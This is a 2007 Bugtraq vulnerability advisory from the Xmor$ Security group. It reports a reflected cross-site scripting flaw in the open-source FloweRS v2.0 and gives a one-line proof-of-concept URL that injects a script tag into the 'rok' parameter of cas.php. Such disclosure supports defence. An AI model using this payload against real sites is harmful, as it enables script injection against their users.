
Date: 14 Apr 2007 06:34:37 -0000
From: the_3dit0r@...oo.com
To: bugtraq@...urityfocus.com
Subject: FloweRS v2.0 Cross Site Scripting

"""""""""""""""""""""""""""""""""""""""""""""""
"""  ::     ::                :::::   ::::  """
"""   ::   ::                 ::  :   ::    """
"""     ::::    ::   :: ::::: :::::   ::::  """
"""    ::  ::   ::: ::: :: :: ::  ::    ::  """
"""  ::      :: :: :  : ::::: ::   :: ::::  """
"""                                         """
"""""""""""""""""""""""""""""""""""""""""""""""
   Xmor$ Security Vulnerability Research TM


# Tilte: FloweRS v2.0 Cross Site Scripting 


# Author..................: [the_Edit0r]
# HomePage................: [Www.XmorS-SEcurity.coM]
# Location ...............: [Iran]
# Software ...............: [FloweRS 2] 
# Download Script.........: [http://sourceforge.net/projects/flowers/]
# We ArE .................: [ Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel ]




------------------------------- proof Of Concept ---------------------------


 www.example.com/[path]/cas.php?rok=<script>alert(/the_Edit0r/);</script>


----------------------------------------------------------------------------


# Contact me : the_3dit0r[at]Yahoo[dot]coM

# [XmorS-SEcurity.coM]
